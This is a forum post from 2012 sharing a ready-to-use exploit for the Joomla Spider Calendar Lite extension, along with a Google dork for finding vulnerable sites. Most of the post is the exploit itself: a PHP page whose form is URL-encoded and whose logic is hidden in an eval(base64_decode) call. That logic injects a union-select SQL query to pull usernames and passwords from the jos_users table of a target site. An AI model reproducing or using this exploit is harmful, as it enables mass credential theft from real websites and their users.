Joomla spider calendar Remote Exploit

D4NB4R · Agosto 31, 2012, 04:22:31 PM

Hey como estan, dejo el ultimo exploit webapps q reporte, puede q depronto les sirva saludos !!!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Código: text

 Exploit Title: Joomla spider calendar lite Remote Exploit

 dork: inurl:com_spidercalendar
 
 Date: [29-08-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 site: http://poisonsecurity.wordpress.com/
 
 Vendor: http://web-dorado.com/products/spider-calendar-lite.html
 
 Version: Last 
 
 License: Non-Commercial

 Demo: http://web-dorado.com/products/spider-calendar-lite.html

 Download: http://web-dorado.com/products/spider-calendar-lite.html
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  _84kur10_, dedalo, nav


Descripcion: 

Spider Calendar Lite is a highly configurable Joomla extension which allows you to have multiple organized events in a calendar. You can create as many events as you need for a day. With a simple click on the date you will see the events and their descriptions recorded for that day. 

Usage:  http:127.0.0.1/exploit.php

note: Copy the following code completely and paste it in your file exploit.php

Exploit: 


<script><!--
document.write(unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3ESpider%20Calendar%20Joomla%20Exploit%3C/title%3E%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Diso-8859-1%22%3E%3Cstyle%20type%3D%22text/css%22%3E%0A%3C%21--%0Abody%2Ctd%2Cth%20%7B%0A%09color%3A%20%23FF0000%3B%0A%7D%0Abody%20%7B%0A%09background-color%3A%20%23000000%3B%0A%7D%0A--%3E%0A%3C/style%3E%3C/head%3E%0A%0A%3Cbody%3E%3Cbr%3E%0A%3Cbr%3E%3Ccenter%3E%0A%3Cimg%20src%3D%22http%3A//a4.sphotos.ak.fbcdn.net/hphotos-ak-ash3/553280_444893268875730_721348140_n.jpg%22%20width%3D%22125%22%20height%3D%22109%22%20align%3D%22middle%22%20longdesc%3D%22Posion%20Security%20%22%3E%3Cbr%3E%3C/center%3E%0A%3Cdiv%20align%3D%22center%22%3E%3Cbr%3E%0A%20%20%3Ca%20href%3D%22https%3A//poisonsecurity.wordpress.com%22%3EPoison%20Securtity%3C/a%3E%20%3Cbr%3E%0A%20%20Joomla%20Spider%20Calendar%20Remote%20Sql%20Exploit%0A%20%3Cbr%3E%0A%20%20%3Cbr%3E%0A%20%20%0A%3C/div%3E%0A%3Cform%20action%3D%22%3Faction%3Dexploit%22%20METHOD%3D%22post%22%3E%0A%3Ctable%20border%3D0%3E%0A%3Ctr%3E%0A%3Ctd%3EIngrese%20La%20url%20del%20Sitio%20%3C/td%3E%0A%3Ctd%3E%3Cinput%20type%3D%22text%22%20name%3D%22url%22/%3E%3C/td%3E%3Ctd%3E%3Cinput%20type%3D%22submit%22%20name%3D%22launch%22/%3E%3C/td%3E%0A%3C/tr%3E%0A%3C/table%3E%0AUso%20%20http%3A//127.0.0.1/path/%3Cbr%3E%0APosible%20dork%3A%20inurl%3Acom_spidercalendar%3Cbr%3E%0A%3Cbr%3E%20%0A%3C/form%3E%0A%3C/body%3E%0A%0A%3C/html%3E"));
//--></script><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYoJF9HRVRbJ2FjdGlvbiddPT0nZXhwbG9pdCcpDQp7DQokcmVzdWx0YWRvPWZpbGVfZ2V0X2NvbnRlbnRzKCRfUE9TVFsndXJsJ10uIi9pbmRleC5waHA/b3B0aW9uPWNvbV9zcGlkZXJjYWxlbmRhciZkYXRlPTk5OTk5OS45JTI3JTIwdW5pb24lMjBhbGwlMjBzZWxlY3QlMjBudWxsJTJDbnVsbCUyQ2NvbmNhdCUyODB4M0QzRDNEM0QzRCx1c2VybmFtZSwweDNELHBhc3N3b3JkLDB4M0QzRDNEM0QzRCUyOSUyQ251bGwlMkNudWxsJTJDbnVsbCUyMGZyb20lMjBqb3NfdXNlcnMrLS0rJTIwRDROQjRSIik7DQokcGFydGVzPWV4cGxvZGUoIj09PT09IiwkcmVzdWx0YWRvKTsNCmVjaG8gJHBhcnRlc1sxXTsNCn1lbHNlew0KZWNobyAiSW5ncmVzZSBVcmwiOw0KfQ0KLy9ENE5CNFIgMjAxMg0KLypTaSB1c3RlZCBlc3RhIGxleWVuZG8gZXN0ZSBtZW5zYWplIGxvIGZlbGljaXRvIHBvciBxdWUgc2lnbmlmaWNhIHF1ZSBubyBsZSBiYXN0YSBzb2xvIGNvbiBxdWUgbGUgZGUgbGEgY2xhdmUsIHNpIG5vIHF1ZSB1c3RlZCBxdWllcmUgc2FiZXIgZWwgcG9ycXVlIGRhIGxhIGNsYXZlLCBhdW5xdWUgZXMgYWxnbyB0YW4gc2ltcGxlIGVzbyBsbyBoYWNlIGRpZmVyZW50ZSBkZSBtdWNob3MsIG1pIGFtaWdvIF84NGt1cjEwXyB5IHlvIEQ0TkI0UiBsZSBzYWx1ZGFtb3MqLw=="));
?>


# 1337day.com [2012-08-29]

D4NB4R

Joomla spider calendar Remote Exploit

D4NB4R

Agosto 31, 2012, 04:22:31 PM Ultima modificación: Agosto 16, 2014, 10:36:23 AM por Expermicid